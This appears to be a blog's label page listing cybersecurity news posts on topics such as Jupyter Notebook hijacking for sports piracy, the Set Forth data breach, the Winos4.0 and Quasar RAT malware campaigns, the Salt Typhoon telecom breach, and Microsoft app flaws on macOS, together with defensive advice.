Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Hackers. Show all posts
Threat actors
beIN Sports Cloud Security Cyber Attacks data analysis FFmpeg Hackers Jupyter Notebooks live streaming sports piracy stream ripping Threat actors

Hackers Exploit Jupyter Notebooks for Sports Piracy Through Stream Ripping Tools

 

Malicious hackers are taking advantage of misconfigured JupyterLab and Jupyter Notebooks to facilitate sports piracy through live stream capture tools, according to a report by Aqua Security shared with The Hacker News.

The attack involves hijacking unauthenticated Jupyter Notebooks to gain initial access and execute a series of steps aimed at illegally streaming sports events. This activity was uncovered during an investigation into attacks on Aqua's honeypots.

"First, the attacker updated the server, then downloaded the tool FFmpeg," explained Assaf Morag, director of threat intelligence at Aqua Security. "This action alone is not a strong enough indicator for security tools to flag malicious activity."

Morag noted that the attackers then executed FFmpeg to capture live sports streams, redirecting them to their server. The campaign’s ultimate objective is to download FFmpeg from MediaFire, capture live feeds from Qatari network beIN Sports, and rebroadcast the content illegally via ustream[.]tv. This tactic allows the attackers to misuse compromised Jupyter Notebook servers as intermediaries while profiting from advertising revenues linked to the unauthorized streams.

Although the identity of the hackers remains unclear, one of the IP addresses used (41.200.191[.]23) suggests they may originate from an Arabic-speaking region.

"However, it's crucial to remember that the attackers gained access to a server intended for data analysis, which could have serious consequences for any organization's operations," Morag added.

He warned that the risks extend beyond piracy, potentially leading to denial-of-service attacks, data manipulation, theft, corruption of AI and ML processes, lateral movement within critical systems, and severe financial and reputational harm.
Read more »
Personal Data
Data Breach Data breaches attacks Data protection Data Theft Financial Data Hacker attack Hackers Personal Data

Set Forth Data Breach: 1.5 Million Impacted and Next Steps

 

The debt relief firm Set Forth recently experienced a data breach that compromised the sensitive personal and financial information of approximately 1.5 million Americans. Hackers gained unauthorized access to internal documents stored on the company’s systems, raising serious concerns about identity theft and online fraud for the affected individuals. Set Forth, which provides administrative services for Americans enrolled in debt relief programs and works with B2B partners like Centrex, has initiated notification protocols to inform impacted customers. The breach reportedly occurred in May this year, at which time Set Forth implemented incident response measures and enlisted independent forensic specialists to investigate the incident. 

However, the full extent of the attack is now coming to light. According to the company’s notification to the Maine Attorney General, the hackers accessed a range of personal data, including full names, Social Security numbers (SSNs), and dates of birth. Additionally, information about spouses, co-applicants, or dependents of the affected individuals may have been compromised. Although there is currently no evidence that the stolen data has been used maliciously, experts warn that it could end up on the dark web or be utilized in targeted phishing campaigns. This breach highlights the ongoing risks associated with storing sensitive information digitally, as even companies with incident response plans can become vulnerable to sophisticated cyberattacks. 

To mitigate the potential damage, Set Forth is offering free access to Cyberscout, an identity theft protection service, for one year to those affected. Cyberscout, which has over two decades of experience handling breach responses, provides monitoring and support to help protect against identity fraud. Impacted customers will receive notification letters containing instructions and a code to enroll in this service. For those affected by the breach, vigilance is critical. Monitoring financial accounts for unauthorized activity is essential, as stolen SSNs can enable hackers to open lines of credit, apply for loans, or even commit crimes in the victim’s name. 

Additionally, individuals should remain cautious when checking emails or messages, as hackers may use the breach as leverage to execute phishing scams. Suspicious emails—particularly those with urgent language, unknown senders, or blank subject lines—should be deleted without clicking links or downloading attachments. This incident serves as a reminder of the potential risks posed by data breaches and the importance of proactive protection measures. While Set Forth has taken steps to assist affected individuals, the breach underscores the need for businesses to strengthen their cybersecurity defenses. For now, impacted customers should take advantage of the identity theft protection services being offered and remain alert to potential signs of fraud.
Read more »
Ransomwares
Company Breach Cyber Attacks Cybersecurity awareness Data Theft Financial Data Breach Hackers ransomware attacks Ransomwares

How to Prevent a Ransomware Attack and Secure Your Business

 

In today’s world, the threat of cyberattacks is an ever-present concern for businesses of all sizes. The scenario of receiving a call at 4 a.m. informing you that your company has been hit by a ransomware attack is no longer a mere fiction; it’s a reality that has affected several major companies globally. In one such instance, Norsk Hydro, a leading aluminum and renewable energy company, suffered a devastating ransomware attack in 2019, costing the company an estimated $70 million. This incident highlights the vulnerabilities companies face in the digital age and the immense financial and reputational toll a cyberattack can cause. 

Ransomware attacks typically involve hackers encrypting sensitive company data and demanding a hefty sum in exchange for decryption keys. Norsk Hydro chose not to pay the ransom, opting instead to rebuild their systems from scratch. Although this route avoided funding cybercriminals, it proved costly in both time and resources. The question remains, what can be done to prevent such attacks from occurring in the first place? The key to preventing ransomware and other cyber threats lies in building a robust security infrastructure. First and foremost, organizations should implement strict role-based access controls. By defining specific roles for employees and limiting access to sensitive systems based on their responsibilities, businesses can reduce the attack surface. 

For example, financial analysts should not have access to software development repositories, and developers shouldn’t be able to access the HR systems. This limits the number of users who can inadvertently expose critical systems to threats. When employees change roles or leave the company, it’s essential to adjust their access rights to prevent potential exploitation. Additionally, organizations should periodically ask employees whether they still require access to certain systems. If access hasn’t been used for a prolonged period, it should be removed, reducing the risk of attack. Another critical aspect of cybersecurity is the implementation of a zero-trust model. A zero-trust security approach assumes that no one, whether inside or outside the organization, should be trusted by default. 

Every request, whether it comes from a device on the corporate network or a remote one, must be verified. This means using tools like single sign-on (SSO) to authenticate users, as well as device management systems to assess the security of devices trying to access company resources. By making trust contingent on verification, companies can significantly mitigate the chances of a successful attack. Moreover, adopting a zero-trust strategy requires monitoring and controlling which applications employees can run on their devices. Unauthorized software, such as penetration testing tools like Metasploit, should be restricted to only those employees whose roles require them. 

This practice not only improves security but also ensures that employees are using the tools necessary for their tasks, without unnecessary exposure to cyber risks. Finally, no security strategy is complete without regular fire drills and incident response exercises. Preparing for the worst-case scenario means having well-documented procedures and ensuring that every employee knows their role during a crisis. Panic and confusion can worsen the impact of an attack, so rehearsing responses and creating a calm, effective plan can make all the difference. 

 Preventing cyberattacks requires a combination of technical measures, strategic planning, and a proactive security mindset across the entire organization. Business leaders must prioritize cybersecurity just as they would profitability, growth, and other business metrics. By doing so, they will not only protect their data but also ensure a safer future for their company, employees, and customers. The impact of a well-prepared security system is immeasurable and could be the difference between an incident being a minor inconvenience or a catastrophic event.
Read more »
Winos4.0
China Hackers malware Windows Winos4.0

Growing Use of Winos4.0 Toolkit Poses New Threat to Windows Users

 



Advanced hacking toolkit Winos4.0 spreads across the globe, security experts warn. Originally reported by Trend Micro, this new toolkit-just like known kits Cobalt Strike and Sliver-was connected to a string of recent cyber attacks in China, having initially spread through fake software downloads. This year, Fortinet reported that the toolkit is also disseminated through game-themed files, which now tends to expand and might pose a risk to a larger user base.


Attack Framework

Winso4.0 is a post-exploitation toolkit: after successfully gaining initial access to a system, the attackers use it for further invasion and domination. First, it was discovered inside the applications downloaded by users who considered it software in their interest, including VPNs or Google Chrome downloads for the Chinese market. Under the aliases Void Arachne or Silver Fox, the attackers entice users with these very popular applications full of malicious components designed to compromise their systems.

New strategies involve attackers using game applications, via which they have broadcasted Winos4.0, again targeting Chinese users mainly. This way, hackers change and utilise attractive downloads to penetrate devices.


Infection Stages

When one of such benign-looking files is downloaded by a victim, the Winos4.0 toolkit initiates a four-phase infection:

1. Stage 1: After installation, a DLL file you.dll, was retrieved from a remote domain. This file installed persistence on the device by setting values in the Windows Registry such that the malware would persist after the system restarts:.

2. Stage 2: At this step, the injected shellcode is loaded to download necessary APIs and communicate with a C2 server, which enables hackers to send commands and retrieve files from the infected device.

3. Stage 3: It fetches more encoded data from the C2 server in a second DLL file named上线模块.dll which saves to the Windows Registry to be used later, apart from updating server addresses to maintain an active link between the malware and its operators.

4. Final Stage: The last stage (login module.dll) will activate all main functions of the toolkit, including detailed system data gathering (like IP address and type of OS), detection of security tools, searching for crypto-wallets, and keeping a hidden backdoor. Through this backdoor connection, hackers can exfiltrate data, execute commands, and sustain their activity monitoring.

 

Evasion Techniques

Winos4.0 already has an inbuilt scanner for the detection of security products, including commercial products by Kaspersky, Avast, Bitdefender, and Malwarebytes. It will then change its behaviour to avoid detection or even quit if the toolkit finds itself running in an environment that is under surveillance. This versatility makes the tool very dangerous when it gets into cybercriminals' hands.

 

Emerging Menace

The fact that the toolkit Winos4.0 is still being used and fine-tuned points towards the growing importance of this toolkit in cyberattack strategies. As explained by Fortinet, it is a versatile and powerful framework "designed for remote control of compromised systems." Ongoing activity like this indicates that Winos4.0 is becoming a tool hackers like to use to gain control over Windows machines.


Preventive Actions

Always ready for downloading is a constant warning from the security experts to users, especially when it comes to free softwares or games which seem popular.

Avoid downloading applications and other forms of files from unknown sources. Even verifying if the software or file is coming from a legitimate source may also save it from infection. Moreover, one's security software must be updated frequently.

Knowing the threats of Winos4.0 would prevent many users from this malicious software by making them aware of this sophisticated malware.


Read more »
ProPublica
Cyber Attacks Facebook Ads Facebook Hackers fake ads Hackers Internet scammers Meta Online Security ProPublica

Meta Struggles to Curb Misleading Ads on Hacked Facebook Pages

 

Meta, the parent company of Facebook, has come under fire for its failure to adequately prevent misleading political ads from being run on hacked Facebook pages. A recent investigation by ProPublica and the Tow Center for Digital Journalism uncovered that these ads, which exploited deepfake audio of prominent figures like Donald Trump and Joe Biden, falsely promised financial rewards. Users who clicked on these ads were redirected to forms requesting personal information, which was subsequently sold to telemarketers or used in fraudulent schemes. 

One of the key networks involved, operating under the name Patriot Democracy, hijacked more than 340 Facebook pages, including verified accounts like that of Fox News meteorologist Adam Klotz. The network used these pages to push over 160,000 deceptive ads related to elections and social issues, with a combined reach of nearly 900 million views across Facebook and Instagram. The investigation highlighted significant loopholes in Meta’s ad review and enforcement processes. While Meta did remove some of the ads, it failed to catch thousands of others, many with identical or similar content. Even after taking down problematic ads, the platform allowed the associated pages to remain active, enabling the perpetrators to continue their operations by spawning new pages and running more ads. 

Meta’s policies require ads related to elections or social issues to carry “paid for by” disclaimers, identifying the entities behind them. However, the investigation revealed that many of these disclaimers were misleading, listing nonexistent entities. This loophole allowed deceptive networks to continue exploiting users with minimal oversight. The company defended its actions, stating that it invests heavily in trust and safety, utilizing both human and automated systems to review and enforce policies. A Meta spokesperson acknowledged the investigation’s findings and emphasized ongoing efforts to combat scams, impersonation, and spam on the platform. 

However, critics argue that these measures are insufficient and inconsistent, allowing scammers to exploit systemic vulnerabilities repeatedly. The investigation also revealed that some users were duped into fraudulent schemes, such as signing up for unauthorized monthly credit card charges or being manipulated into changing their health insurance plans under false pretences. These scams not only caused financial losses but also left victims vulnerable to further exploitation. Experts have called for more stringent oversight and enforcement from Meta, urging the company to take a proactive stance in combating misinformation and fraud. 

The incident underscores the broader challenges social media platforms face in balancing open access with the need for rigorous content moderation, particularly in the context of politically sensitive content. In conclusion, Meta’s struggle to prevent deceptive ads highlights the complexities of managing a vast digital ecosystem where bad actors continually adapt their tactics. While Meta has made some strides, the persistence of such scams raises serious questions about the platform’s ability to protect its users effectively and maintain the integrity of its advertising systems.
Read more »
quasar RAT
Hackers LNKs malware Meta phishing quasar RAT

Vietnamese Hackers Target Digital Marketers in Malware Attack

 



Cyble Research and Intelligence Lab recently unearthed an elaborate, multi-stage malware attack targeting not only job seekers but also digital marketing professionals. The hackers are a Vietnamese threat actor who was utilising different sophisticated attacks on systems by making use of a Quasar RAT tool that gives a hacker complete control of an infected computer. 


Phishing emails and LNK files as entry points

The attack initiates with phishing emails claiming an attached archive file. Inside the archive is a malicious LNK, disguised as a PDF. Once the LNK is launched, it executes PowerShell commands, which download additional malicious scripts from a third-party source, thus avoiding most detection solutions. The method proves very potent in non-virtualized environments in which malware remains undiscovered inside the system.


Quasar RAT Deployment

Then, the attackers decrypt the malware payload with hardcoded keys. Quasar RAT - a kind of RAT allowing hackers to obtain total access over the compromised system - is started up. Data can be stolen, other malware can be planted, and even the infected device can be used remotely by the attackers.

The campaign targets digital marketers primarily in the United States, using Meta (Facebook, Instagram) advertisements. The malware files utilised in the attack were designed for this type of user, which has amplified its chances.


Spread using Ducktail Malware

In July 2022, the same Vietnamese threat actors expanded their activities through the launch of Ducktail malware that specifically targeted digital marketing professionals. The group included information stealers and other RATs in its attacks. The group has used MaaS platforms to scale up and make their campaign versatile over time.


Evasion of Detection in Virtual Environments

Its superiority in evading virtual environment detection makes this malware attack all the more sophisticated. Here, attackers use the presence of the "output.bat" file to determine whether it's running in a virtual environment or not by scanning for several hard drive manufacturers and virtual machine signatures like "QEMU," "VirtualBox," etc. In case malware detects it's been run from a virtual machine, it lets execution stop analysis right away.

It proceeds with the attack if no virtual environment is detected. Here, it decodes more scripts, to which include a fake PDF and a batch file. These are stored in the victim's Downloads folder using seemingly innocent names such as "PositionApplied_VoyMedia.pdf."


Decryption and Execution Methods

Once the PowerShell script is fully executed, then decrypted strings from the "output.bat" file using hardcoded keys and decompressed through GZip streams. Then, it will produce a .NET executable running in the memory which will be providing further evasion for the malware against detection by antivirus software.

But the malware itself, also performs a whole cycle of checks to determine whether it is running in a sandbox or emulated environment. It can look for some known file names and DLL modules common in virtualized settings as well as measure discrepancies in time to detect emulation. If these checks return a result that suggests a virtual environment, then the malware will throw an exception, bringing all subsequent activity to a halt.

Once the malware has managed to infect a system, it immediately looks for administrative privileges. If they are not found, then it uses PowerShell commands for privilege escalation. Once it gains administrative control, it ensures persistence in the sense that it copies itself to a hidden folder inside the Windows directory. It also modifies the Windows registry so that it can execute automatically at startup.


Defence Evasion and Further Damage 

For the same purpose, the malware employs supplementary defence evasion techniques to go unnoticed. It disables Windows event tracing functions which makes it more difficult to track its activities by security software. In addition to this, it encrypts and compresses key components in a way that their actions are even more unidentifiable.

This last stage of the attack uses Quasar RAT. Both data stealing and long-term access to the infected system are done through the use of a remote access tool. This adapted version of Quasar RAT is less detectable, so the attackers will not easily have it identified or removed by security software.

This is a multi-stage malware attack against digital marketing professionals, especially those working in Meta advertising. It's a very sophisticated and dangerous operation with phishing emails, PowerShell commands combined with advanced evasion techniques to make it even harder to detect and stop. Security experts advise on extreme caution while handling attachment files from emails, specifically in a non-virtualized environment; all the software and systems must be up to date to prevent this kind of threat, they conclude.


Read more »
wiretapping
CALEA China Cybersecurity Data Breach Encryption Hackers Privacy surveillance Telecom wiretapping

China-backed Hackers Breach U.S. Telecom Wiretap Systems, Sparking Security Concerns

 

China-backed hackers infiltrated wiretap systems of multiple U.S. telecom and internet providers, reportedly seeking to collect intelligence on American citizens. This revelation has raised alarm in the security community.

Wiretap systems, required by a 30-year-old U.S. federal law, allow a small number of authorized employees access to sensitive customer data, including internet activity and browsing history. These systems, now compromised, highlight long-standing concerns about their vulnerability.

Security experts had long warned about the risks of legal backdoors in telecom systems. Many saw this breach as an inevitable outcome of such vulnerabilities being exploited by malicious actors. Georgetown Law professor Matt Blaze remarked that this scenario was “absolutely inevitable.”

According to the Wall Street Journal, the hacking group, Salt Typhoon, accessed systems used by major U.S. internet providers like AT&T, Lumen, and Verizon. The group reportedly collected large amounts of internet traffic, and a U.S. government investigation is now underway.

The hackers' goals remain unclear, but experts believe the breach could be part of a larger Chinese effort to prepare for potential cyberattacks in the event of conflict, possibly over Taiwan. The intrusion reinforces the dangers of security backdoors.

Riana Pfefferkorn, a Stanford academic, pointed out that this hack exposes the risks of U.S. wiretap systems, arguing that these measures jeopardize citizens’ privacy rather than protecting them. She advocates for increased encryption as a solution to these vulnerabilities.

The compromised wiretap systems are part of the Communications Assistance for Law Enforcement Act (CALEA), a law enacted in 1994 to help the government access telecom data through lawful orders. However, this system has become a target for hackers and malicious actors.

After 9/11, U.S. surveillance laws expanded wiretapping to collect intelligence, sparking an entire industry dedicated to facilitating these operations. Yet, the extent of government access to private data was only exposed in 2013 by whistleblower Edward Snowden.

Post-Snowden, tech giants like Apple and Google began encrypting customer data to prevent unauthorized access, even from government agencies. However, telecom companies have been slower to follow suit, leaving much U.S. phone and internet traffic vulnerable to wiretapping.

Governments worldwide continue to push for legal backdoors into encrypted systems. In the EU, for example, proposed laws aim to scan private messages for illegal content, raising security concerns among experts.

Signal, the encrypted messaging app, warned of the dangers of backdoors, pointing to the Chinese hacking incident as an example of why such measures pose severe cybersecurity risks. Meredith Whittaker, Signal’s president, stressed that backdoors cannot be restricted to just "the good guys."

Blaze called the CALEA law a cautionary tale, emphasizing the dangers of building security systems with inherent vulnerabilities.
Read more »
phishing
DDOS Attack Hackers IP Address Personal Data phishing

Shocking Ways Hackers Can Exploit Your IP Address – You’re Not as Safe as You Think




Your IP address may look like a long number row, but to a hacker, it can be an instrument of evil activity. While your exposure to an IP doesn't pose an immediate danger per se, it is thus important to understand what a hacker can do with it. Let's break down how cybercriminals can exploit an IP and how you can keep it safe.

Determining Your Broad Area of Location

The very first thing a hacker will easily know once he has obtained your IP address is your general area of location. He can find out your city or region using even simple online tools such as IP tracking websites. Of course, he won't pinpoint the street number but can already pinpoint your general area or location which may trigger other related hacking attempts such as phishing attacks. Hackers would use your address and ISP to dupe you through social engineering.

IP Spoofing: Identity Mimicry Online

The hacker can manipulate the IP addresses and make it seem like the actions they are performing are coming from your device. In this method, which is known as IP spoofing, hackers perpetrate various illegal activities while concealing identities. Many people employ IP spoofing in DDoS attacks whereby hackers inject tremendous amounts of traffic into a network to actually shut it down. Using your IP address during this attack may keep them undetected while they wreck the damage.

Selling Your IP Address

One seems minute, but hackers sell bundles of thousands of IP addresses in bulk across the dark web, and those addresses can be used in large-scale social engineering projects that lead to data theft. Used with other personal data, your IP address can be a wonderful commodity in some hacker's arsenal, allowing them to crack into almost any online account.

Scanning for Further Information

Using this method, and with the use of such tools as Nmap, hackers can not only obtain your IP but also uncover which OS your machine is running, applications that are installed, and open ports. If vulnerabilities exist in your system, they can launch specific attacks on those particular weaknesses, which will then allow them to get into your network, and even control your devices.

A DDoS attack

Although it is seldom that DDoS attacks any user, hackers can use your IP to attack you using DDoS, which will turn your device into a traffic flooder and take it offline. Such attacks are usually employed in larger organisations, although those engaging in activities such as online gaming and other competitive activities are also at risk. For instance, some players have used DDoS attacks to cut off their opponents' internet.

How to Hide Your IP Address

The likelihood that someone actually targeted you may be low, but this is equally as important to adhere to these safety precaution guidelines. With a virtual private network or a proxy server, your public IP address remains hidden, which makes it extremely hard for hackers to find and take advantage of it. It can also protect your devices by updating them as regularly as possible and using firewalls.

It is important to note that knowing an IP address doesn't give hackers total control over your system. However, it can be part of a scheme that encourages them to come closer to extracting more personal information or conducting attacks. However, usually there's little chance that someone would go out of his way to harm you using just your IP address; still, you can never be too safe. Securing the network and masking the IP simply reduces these risks from IP-based attacks.

Care needs to be taken, and preventative measures need to be in place so that nobody would use those malpractices against you.


Read more »
Hackers
Cyber Security CyberCrime Cyberhackers Cyberthreats Election Security Elections Hackers

Election Sabotage via Cyberattacks Increases

 


Several predictions have pointed out that 2024 will not only be an election year but also a year of civil rights. Security has identified an increasing trend of malicious cyber activity aimed at imperilling sovereign elections around the world as one of the most important elections of all time. In an election year that is set to take place in 2024, there will be more than ever malicious cyber activity that will attempt to undermine the elections. 

The occurrence of this trend is particularly concerning during a time of unprecedented geopolitical volatility, which is characterized by 64 countries (including the European Union) holding national elections in the coming year, according to Time Magazine. The number of eligible voters in this election amounts to approximately 2 billion, which represents almost 49 per cent of the world's population. 

The results of these elections will have lasting consequences for a significant number of these voters for years to come, according to Time Magazine, which reported the results earlier this week. In terms of geopolitical relations and military conflicts around the world, the U.S. presidential election has been by far the most important contest this year. 

Expectations are that the outcome of this election could cause a profound change in the future of global conflict. This rise in tension is occurring at a time when there is a deepening political divide in the US, as well as increasing tensions abroad over Gaza, Ukraine, and other issues. 

There is no doubt that the US is not the only country that is being surveyed, so what critical threats should people pay attention to - and in what ways might they potentially harm the democratic process as a whole? The mounting evidence in favour of cyber criminals having increased their arsenal of tools to disrupt and influence elections is increasingly clear as the escalating war on democracy gains momentum. 

There is a variety of methods they use, and they are becoming increasingly sophisticated over time. As a result, in some cases, the breach of personal data is directly related to the attack at critical infrastructure and the dangers associated with protecting the infrastructure. Throughout history, cybercriminals have developed their skills at stealing and releasing private information about political figureheads, which they use to manipulate public opinion and manipulate public policy. Also, they have managed to become experts at social engineering, where they often trick people into giving up their account or system passwords or downloading and running malware through the use of e-mails and text messages that appear legitimate but are fake and malicious.

It is possible for attackers also to exploit software vulnerabilities in applications, devices, computers, or servers, and these vulnerabilities can be purchased on black markets, which has led to an increase in cybercrime. These platforms were designed to amplify the hype of sensationalist headlines, frequently encouraging users to share sensationalist headlines even when there is some doubt as to their accuracy. Despite the bombardment of misinformation, public understanding has been muddied, dangerous conspiracy theories are being cultivated, and opinions and actions are being manipulated by deception and deceit. 

In manoeuvres such as the so-called "firehose of falsehood," citizens are bombarded with innumerous falsehoods that they cannot discern right from wrong, and their faith in the government and political institutions is undermined as a result. As an example, someone can impersonate the social media profiles of candidates, which will then be used to mislead voters either about their political views or about their candidates. 

As well as deep fakes, there are other new challenges to be faced, such as doctored videos and photos designed to give the appearance of truth but convey false information. In addition to the possibility of detecting and correcting such types of disinformation, the damage may already be done in the minds of the voters if they are exposed to them. In this election season, there is a rise in misinformation campaigns designed to discourage voters from going to the polls, as well as cyberbullying and threats targeting candidates and public figures in an attempt to subdue them. 

As trolls continue to sow discord and intimidation across social media and social media platforms, they are stifling meaningful participation among other marginalised groups. It is possible for foreign actors to marginalize legitimate citizen voices and undermine the democratic process in a wide range of ways by disrupting online discussions and deploying strategic ad campaigns, bots, and troll armies. Before the start of 2024, the Canadian Centre for Cyber Security (CCCS) published a report saying there had been an increase in cyberattacks targeted at elections, similar to our findings and conclusions. 

There has been a significant increase in the proportion of global elections in which cyber enemies are targeting the ballot box from 10 per cent in 2015 to 26 per cent in 2022. This report shows that approximately 25 per cent and 35 percent, respectively, of the countries targeted by these attacks throughout this reporting period were NATO countries, and more recently, OECD countries. It is worth noting, however, that Resecurity also observed a 100 per cent increase in activity between the previous analysis period and 2023 and early 2024, in addition to the continued targeting of the United States and its allies. 

As part of this assessment, a total of 15 incidents were observed by Resecurity and reported to the appropriate authorities worldwide in the following jurisdictions: Africa, the European Union, the United Kingdom, Ecuador, Bangladesh, Indonesia, Israel, Iraq, Lebanon, Turkey, and Mexico, as well as some incidents in other regions. Threat actors are not only engaged in cyber espionage, but they are also devising operations intending to disrupt and manipulate public opinion much like those that the Cold War conducted. 

These incidents, however, remain difficult from an investigation perspective, and it is often not obvious to the public that they are occurring. During historically volatile and uncertain geopolitical periods, marked by the escalation of conflicts throughout the Middle East and Eastern Europe, election security from hostile cyber-threats has become needed to sustain the global democratic order in this era of global instability. We intend that this report will focus on malign cyber-activity that targets elections in more than 17 countries across the globe in the coming several months. 

Using disruptive cyber techniques, which threaten the very fabric of democratic processes from within is a profound and far-reaching threat whose consequences are profound and far-reaching. A cyberattack that targets a political campaign isn't just an attempt to violate personal privacy - it's a calculated effort to manipulate democratic processes and sow discord among voters by compromising their privacy. These acts of digital sabotage have profound implications for the electoral system. If left unchecked, these acts will continue to erode public trust in an electoral system that is renowned for its transparency and legitimacy, further weakening what is already a deeply divided society.
Read more »
Vulnerabilities and Exploits
Cisco Cybersecurity CyberThreat Excel Hackers macOS Microphone Microsoft App OneNote Outlook TCC Transparency Data Vulnerabilities and Exploits

Mac Users Targeted by Hackers Through Microsoft App Security Flaw

 


During the past couple of weeks, Cisco Talos, one of the world's most respected cybersecurity companies known for its cutting-edge cybersecurity products, has discovered at least eight security vulnerabilities. As a result of these bugs, researchers have found that the cameras and microphones of users of those applications may be accessed by attackers who exploit them for malicious purposes. In addition to this, a vulnerability like this could be exploited to steal other types of sensitive information, which can have a detrimental effect on the security of the system as well. 

It has been reported that many widely used Microsoft apps, including Word, Outlook, Excel, OneNote, Teams, and others, have been affected. To carry out this attack, malicious libraries to gain access to the user's entitlements and permissions are injected into Microsoft apps so that hackers can access a user's entitlements and permissions. According to the problem, this result is caused by the fact that Microsoft apps work with the Transparency and Consent framework on macOS, which allows applications to manage their permissions on a system with the Transparency Consent framework. 

The security vulnerability found in Microsoft's Mac apps made it possible for hackers to spy on Mac users without their knowledge. A security researcher from Cisco Talos posted a blog post explaining how attackers could exploit the vulnerability in Windows and what Microsoft has been doing to fix the problem. According to Cisco Talos, a security company, Microsoft's macOS apps, like Outlook, Word, Teams, OneNote, and Excel, contain a major flaw that renders them unusable. By taking advantage of this vulnerability, attackers can inject malicious libraries into these apps, which will give them access to the permissions and entitlements granted by the user. 

According to Apple's macOS framework, permission-based data collection relies on the Transparency, Consent, and Control framework, which is composed of three components. As a result, macOS will request permission from the user before running new apps and display prompts when an app asks for sensitive information, for example, contacts, photos, webcam data, etc. when the user wants to grant permission from the computer. It is important to understand that the severity of these vulnerabilities varies depending on the app and its permissions. 

There are several ways in which Microsoft Teams, which is a popular tool for professional communication, could be exploited to capture conversations or access sensitive information, for instance. As another example, the report notes that Microsoft Outlook may be used to send unauthorized emails and, ultimately, cause data breaches, according to the report. With the help of TCC, apps must request certain entitlements to access certain features such as the camera, microphone, location services, and other features on the smartphone. 

A majority of apps do not even have to ask for permission to run without these entitlements, preventing access to unauthorized users. Cisco Talos' discovery of the exploit, however, shows that malicious actors are capable of injecting malicious code into Microsoft apps, which then hijacks the permissions that were granted to those apps previously. It means that an attacker with the correct skills can successfully inject code into a software application such as Microsoft Teams or Outlook and gain access to a Mac computer's camera or microphone, allowing them to record audio or take photos without the user's knowledge to do so. 

It was found by Cisco Talo that Microsoft has made an acknowledgement of these security flaws in its applications and has classified them as low risk, in response to Cisco Talo's findings. Additionally, some of Microsoft's applications, including Teams and OneNote, have been updated to address the problem with library validation in these applications. As for other vulnerable apps from Microsoft, such as Excel, PowerPoint, Word, and Outlook, the company has not yet taken action to fix them. Security Concerns Raised Over Vulnerabilities in Microsoft Apps for macOS Recent findings by cybersecurity experts at Cisco Talos have brought to light significant vulnerabilities in popular Microsoft applications for macOS. 

These flaws, discovered in apps such as Outlook, Teams, Word, and Excel, have alarmed users and security professionals alike, as they allow hackers to potentially spy on Mac users by bypassing Apple's stringent security measures. The issue revolves around macOS's Transparency, Consent, and Control (TCC) framework, which is designed to protect users by requiring explicit consent before apps can access sensitive data, such as cameras, microphones, or contacts. However, Cisco Talos researchers uncovered that eight widely used Microsoft apps contained vulnerabilities that could be exploited by attackers to bypass the TCC system. 

This means that hackers could potentially leverage the permissions already granted to these apps to spy on users, send unauthorized emails, or even record videos—all without the user’s knowledge or consent. The researchers expressed concerns about Microsoft’s decision to disable certain security features, such as library validation. This safeguard was originally intended to prevent unauthorized code from being loaded onto an app. 

However, Microsoft’s actions have effectively circumvented the protections offered by the hardened runtime, potentially exposing users to unnecessary security risks. Despite addressing some vulnerabilities, Microsoft has not yet fully resolved the issues across all its macOS applications, leaving apps like Excel, PowerPoint, Word, and Outlook still susceptible to attacks. This partial response has led to further concerns among security experts, who question the rationale behind disabling security measures like library validation when there’s no clear need for additional libraries to be loaded. 

The Cisco Talos team also pointed out that Apple could enhance the security of the TCC framework. One suggestion is to introduce prompts for users whenever third-party plugins are loaded into apps that have already been granted sensitive permissions. This added layer of security would help ensure that users are fully aware of any unusual or unauthorized activities within their applications. Given the current state of these vulnerabilities, both Microsoft and Apple may need to take more proactive steps to protect their users from potential threats. 

As digital communication tools continue to play a critical role in our daily lives, the importance of robust security measures cannot be overstated. In the meantime, Mac users who rely on Microsoft applications are advised to remain vigilant. Keeping their software up to date and monitoring for any unusual activities can help minimize the risk of exploitation. While these companies work on strengthening their defenses, user awareness and caution remain key to navigating the ever-evolving landscape of cybersecurity threats.
Read more »
Taiwan
Air Force Cyber Attacks disinformation campaign Hackers Personal Data Taiwan

Hackers Spread Disinformation to undermine Taiwan’s Military


 

Foreign hackers are increasingly targeting Taiwan by hijacking social media accounts to spread disinformation aimed at undermining the country's military, according to a statement released by the Ministry of Justice Investigation Bureau (MJIB) yesterday.

The hackers, believed to be operating from abroad, are using compromised Internet-connected devices, including surveillance cameras and facial recognition systems, to gain unauthorised access to social media accounts on popular platforms like Dcard and PTT (Professional Technology Temple). By infiltrating these forums, they have been able to post false information that seeks to damage the reputation of Taiwan’s armed forces.

One of the key tactics employed by these cybercriminals is impersonating Taiwanese air force personnel. They have posted misleading content claiming that many military pilots are dissatisfied with their pay and working conditions. Some posts suggest that pilots would rather incur tremendous financial losses than renew their contracts, while others falsely claim that military members are leaving their posts to pursue civilian careers for better work-life balance.

On PTT, an account named “ss900287” further amplified these messages by sharing a link to a photograph that supposedly showed a list of retired military pilots applying for jobs with China Airlines. This, however, is another example of the misinformation being spread to create doubt and discontent among the public regarding Taiwan’s military.

Rise in False Posts Across Social Media

Despite the efforts of the Air Force Command to counteract these false narratives, there has been a noticeable increase in similar disinformation across more than 170 suspicious Facebook groups, including names such as “The Strait Today,” “Commentary by the Commander,” and “You Ban, Me Mad.” These groups are suspected of being part of the coordinated effort to spread misleading content.

Advanced Techniques to Evade Detection

According to the MJIB, the hackers have been able to maintain their disinformation campaign by exploiting vulnerabilities in facial recognition systems, digital cameras, and other networked devices. By stealing personal data and taking over social media accounts, they have managed to pose as legitimate users, making their disinformation appear more credible.

To avoid detection, the hackers have employed sophisticated methods such as data de-identification and rerouting their activities through multiple channels, which has made it difficult to trace their identities and locations. In response, the MJIB has notified social media platforms, requesting that they take action against the groups and users involved in these activities.

The MJIB is advising Taiwanese citizens to gear up the security of their Internet-connected devices. This includes setting strong, unique passwords and regularly updating them to minimise the risk of cyberattacks.

In a related development, fishermen in Penghu County have reported sightings of Chinese fishing boats using fake Taiwanese radar transponder codes in waters near Cimei Township. While these vessels initially appeared to be Taiwanese on radar, visual inspections confirmed their Chinese origin. The Coast Guard Administration has stated that any illegal vessels identified will be expelled from Taiwanese waters.

The reason behind the Chinese fishing boats disguising their transponder codes remains unclear, but it has raised concerns about the potential for further deceptive activities in the region.




Read more »
Technology Threat
Apple Tech Code Hex Credentials Hack Cyber Attacks Cyberthreats Hackers macOS Russian Foreign Intelligence Technology Stealer Technology Threat

New Report Reveals Rising Attacks on macOS Systems

 


